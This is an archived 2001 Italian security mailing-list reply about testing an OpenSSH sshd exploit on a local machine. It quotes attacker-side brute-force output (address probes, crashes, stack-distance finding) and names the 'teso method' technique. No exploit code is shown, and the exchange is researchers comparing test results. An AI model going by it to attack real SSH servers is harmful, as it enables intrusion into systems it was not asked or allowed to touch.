[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
[ Data: precedente | successivo | indice ] [ Argomento: precedente | successivo | indice ]
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
Archivio: Dicembre 2001 ml@sikurezza.org Soggetto: Re: sshd il punto... Mittente: Amodiovalerio Verde Data: 5 Dec 2001 19:53:47 -0000
> Ciao, ci siamo intravisti a CT durante hackit ma dubito ti ricordi di me > ..cmq...veniamo al punto. Ehm...troppa redbull...non ricordo quasi nulla :P > > Da quanto scrivi non capisco come staiprocedendo al test dell'exploit, percio' > vado a naso...l'exploit ceh ho io (x2) pare bloccarsi quando attacca un host, > mentre invece se tu monitori con netstat la "vittima" vedrai ceh apre una > porta alta in ascolto... > Prove molto 'base' Beh lo lancio su un host locale che ha una versione di openssh che dovrebbe essere bacata. Nel contempo mi vedo un po quante porte e connessioni si apre, che flusso di dati ha, etc etc. > se invece guardi la situazione solo dal punto di vista dell'attaccante pare > tutto fermo. > Hmmm non mi risulta...il che mi fa pensare...siamo sicuri che sia lo stesso exploit ? Io l'ho provato su un po di macchine per ora... Guarda questo e' uno snippet di cosa appare lato attaccante... | (37) Trying: 0x08088ac4 # SURVIVED # | Finding distance till stack buffer | (38) Trying: 0xb7f7d400 # SEGV # | (39) Trying: 0xb7f7d054 # SEGV # | (40) Trying: 0xb7f7cca8 # SEGV # | (41) Trying: 0xb7f7c8fc # SURVIVED # verifying | (42) Trying: 0xb7f7c8fc # SEGV # OK | Finding exact h - stack_buf distance | (43) trying: 0xb7f7c6fc slider: 0x0200# SURVIVED # | (44) trying: 0xb7f7c5fc slider: 0x0100# SEGV # | ATTACH NOW | Changing MSW of return address to: 0x0808 | Crash, finding next return address | Changing MSW of return address to: 0x0809 | Crash, finding next return address | Changing MSW of return address to: 0x080a | Crash, finding next return address | EX: buf: 0x08085ac4 h: 0x08081000 ret-dist: 0xb7f7c742 e cosi via' di bruteforce.... (ma non si ferma e non si blocca sembrerebbe) (nel frattempo sulla macchina attaccata mi trovo da netstat ( in locale pero' ) circa 2680 porte in time_wait :P) > sostanzialmetne mi sembra di avere colto che questo exploit e' com 'il crc32 > dei teso o una sua variante. Diciamo che utilizza (e lo dice anche) il metodo teso | (19) testing 0x3819180c # FOUND # | Found buffer, determining exact diff | Finding h - buf distance using the teso method | (20) binary-search: h: 0x0800e800, slider: 0x00010000 # SURVIVED # > Sperando di non averti disturabato ( e di non avere preso una cantonata > epocale :)) ti saluto Disturbato ??? naaaaa Amodiovalerio [Hypo] Verde ________________________________________________________ http://www.sikurezza.org - Italian Security Mailing List
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005